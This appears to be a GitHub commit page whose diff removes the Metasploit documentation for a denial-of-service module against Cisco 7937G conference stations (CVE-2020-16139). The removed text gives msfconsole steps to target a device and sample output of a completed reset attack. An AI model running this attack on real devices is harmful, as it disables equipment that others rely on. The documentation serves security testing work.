debifrank
GitHub
parent
d1afe60262
commit
f6581b9518
|
|
@ -1,30 +0,0 @@
|
||||||
## Vulnerable Application
|
|
||||||
|
|
||||||
1. Obtain a Cisco 7937G Conference Station.
|
|
||||||
2. Enable Web Access on the device (default configuration).
|
|
||||||
3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable.
|
|
||||||
|
|
||||||
## Verification Steps
|
|
||||||
|
|
||||||
1. Start msfconsole
|
|
||||||
2. Do: `use auxiliary/dos/cisco/CVE-2020-16139`
|
|
||||||
3. Do: `set RHOST 192.168.1.10`
|
|
||||||
4. Do: `run`
|
|
||||||
5. The conference station should become inoperable and then power cycle itself.
|
|
||||||
|
|
||||||
## Options
|
|
||||||
|
|
||||||
1. rhost (required) - Target address
|
|
||||||
|
|
||||||
## Scenarios
|
|
||||||
|
|
||||||
Because both successful and unsuccessful attacks result in the request timing out, there
|
|
||||||
is no way to be sure that the attack was completed. It is recommended to attempt a ping
|
|
||||||
to the device immediately afterward to verify device is offline/reseting.
|
|
||||||
|
|
||||||
```
|
|
||||||
[*] Starting server...
|
|
||||||
[*] 192.168.110.209 - Sending DoS packets. Stand by.
|
|
||||||
[*] 192.168.110.209 - DoS reset attack completed!
|
|
||||||
[*] Auxiliary module execution completed
|
|
||||||
```
|
|
||||||
Loading…
Reference in New Issue